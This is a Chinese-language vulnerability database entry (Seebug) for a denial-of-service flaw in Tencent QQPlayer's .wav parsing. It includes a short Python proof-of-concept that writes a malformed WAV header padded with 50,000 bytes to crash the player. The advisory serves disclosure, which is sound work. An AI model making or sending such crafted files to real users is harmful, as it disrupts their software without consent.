QQ影音.wav文件解析拒绝服务漏洞

2010-09-09T00:00:00
ID SSV:20106
Type seebug
Reporter Root
Modified 2010-09-09T00:00:00

Description

BUGTRAQ ID: 43033

QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。

用户受骗使用QQ影音打开了畸形的.wav文件就会导致播放器崩溃。

Tencent QQ影音 2.3.696.400p1 厂商补丁:

Tencent

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://player.qq.com/

                                        
                                            
                                                #!/usr/bin/python
#
###########################################################################################		
# Exploit Title:  QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability       
# Date:		  07-09-2010                                                            
# Author:	  Hadji Samir   , s-Dz[at]hotmail[dot]fr                                
# Software Link:  www.qq.com                                                            
# Version:        QQPlayer 2.3.696.400p1                                                
# Tested on:	  Windows XP sp2                                                        
# CVE :                                                                                 
# Notes:	  Working with filetype Mahboul-3lik.wav (.mp3,.3gp,.avi...)           
#                 Samir tjrs mahboul-3lik ...                                           
#                                                                                                                                
###########################################################################################	
  
boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20")
buff = ("\x41" * 50000 )
wizz = open("Mahboul-3lik.wav","w") 
wizz.write(boom + buff ) 
wizz.close()